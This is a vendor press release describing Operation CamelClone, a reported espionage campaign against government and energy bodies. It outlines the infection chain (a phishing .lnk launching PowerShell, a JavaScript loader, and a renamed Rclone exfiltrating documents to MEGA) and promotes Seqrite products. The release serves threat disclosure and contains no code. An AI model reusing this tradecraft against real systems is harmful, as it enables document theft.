Pune, March 2026: Seqrite, the enterprise security arm of Quick Heal Technologies Limited, a global provider of cybersecurity solutions, has uncovered Operation CamelClone, an active, multi-region cyber espionage campaign targeting government, defense, diplomatic, and strategic energy organisations across Algeria, Mongolia, Ukraine, and Kuwait.
Tracked by the APT research team at Seqrite Labs, India’s largest malware analysis facility, Operation CamelClone uses precision-crafted spear-phishing lures impersonating real ministries and armed forces to deliver a stealthy infection chain that exfiltrates sensitive documents, including procurement plans, policy drafts, and Telegram session data, to anonymous cloud storage accounts, leaving virtually no trace in standard network logs.
The campaign begins with ZIP archives sent via spear-phishing emails, bundling a malicious Windows shortcut (.lnk) file with convincing decoy content, such as “Weapons requirements for the Kuwait Air Force” or “Algerian Ukrainian proposals for cooperation.” When opened, the shortcut silently triggers PowerShell commands that download a JavaScript loader, tracked as HOPPINGANT, from the public file-sharing site filebulldogs[.]com.
HOPPINGANT then retrieves additional payloads and deploys Rclone,, a legitimate file-sync utility, disguised as l.exe, which is configured to authenticate with MEGA cloud storage accounts registered through anonymous email addresses. The malware systematically collects .doc, .docx, .pdf, and .txt files from the victim’s Desktop, exfiltrating them silently to attacker-controlled MEGA folders. Consistent use of a single XOR key, identical Rclone configurations, and the same staging infrastructure across all four regions confirm this is one coordinated, ongoing operation.
Operation CamelClone reflects a broader evolution in state-aligned threats that Seqrite’s India Cyber Threat Report 2026 has documented in detail. The report, drawn from telemetry across more than 8 million endpoints, recorded 265.52 million detections between October 2024 and September 2025, averaging 505 every minute, with APT-linked campaigns blending espionage, hacktivism, and data extortion becoming significantly more prevalent. By standing entirely on legitimate services such as PowerShell, Rclone, MEGA, public file-sharing, Operation CamelClone bypasses conventional security tools, representing precisely the kind of “cognitive intrusion” Seqrite’s 2026 forecast warned was coming.
For governments and critical institutions, the stakes are not limited to system access. When adversaries exfiltrate documents containing personal data of citizens, employees, or diplomatic contacts, obligations under India’s Digital Personal Data Protection (DPDP) Act, 2023 are immediately triggered, including breach notification and accountability for safeguard failures, with penalties up to ₹250 crore.
All Seqrite products are fully compliant with the DPDP Act. Seqrite’s enterprise portfolio, including Seqrite Data Privacy, Seqrite Threat Intelligence, Ransomware Recovery as a Service (RRaaS), and the Digital Risk Protection Service, provides a layered, AI-powered shield purpose-built to detect campaigns like Operation CamelClone, classify and protect targeted document types, and meet regulatory obligations end-to-end.
